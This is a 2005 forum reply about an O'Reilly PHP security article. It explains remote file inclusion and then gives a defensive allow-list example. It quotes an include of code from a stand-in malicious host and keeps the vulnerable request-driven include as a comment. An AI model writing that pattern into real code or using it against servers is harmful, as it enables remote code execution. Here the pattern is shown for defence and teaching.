Article: Ten Security Checks for PHP, Part 1
Subject: Not the kind of article i would expect from o'reilly!
Date: 2005-02-06 03:49:12
From: bbbbbbbbbbbbbb

Response to: Not the kind of article i would expect from o'reilly!

"First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine."

No, in fact it is assumed that www.some-BAD-site.com is NOT running PHP and it provides raw PHP code to the server that runs the include statement. This is the essence of this security risk - the PHP engine will execute PHP code loaded from a different web site.
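
The behaviour described in the reply above, shown from the defender's side as an added example that is not part of the original post or the article: the request-driven include is kept only as a comment, next to an allow-list replacement and a configuration check. The `PAGES` map, `resolve_page()`, `url_include_enabled()` and the demo directory are hypothetical names chosen for illustration.

```php
<?php
// Added example; PAGES, resolve_page() and url_include_enabled() are hypothetical.

// Pattern at issue: the include target is taken from the request. When URL
// wrappers are enabled for include, a URL value makes PHP fetch the response
// body and run it locally, which is the point the reply makes.
//   include($_GET['page']);

// Hardened form: the request only selects a key; file names come from a fixed map.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;                       // URLs and unknown names never reach include
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and stay under $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Configuration check: remote include needs both settings switched on.
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)
        && filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed demo: a temporary directory holding one allow-listed page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo';
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';");

foreach (['home', 'http://www.some-BAD-site.com/whatever.php', 'unknown'] as $input) {
    $file = resolve_page($input, $dir);
    echo str_pad($input, 45), $file === null ? 'rejected' : "include $file", PHP_EOL;
}
echo 'URL include enabled: ', url_include_enabled() ? 'yes' : 'no', PHP_EOL;
```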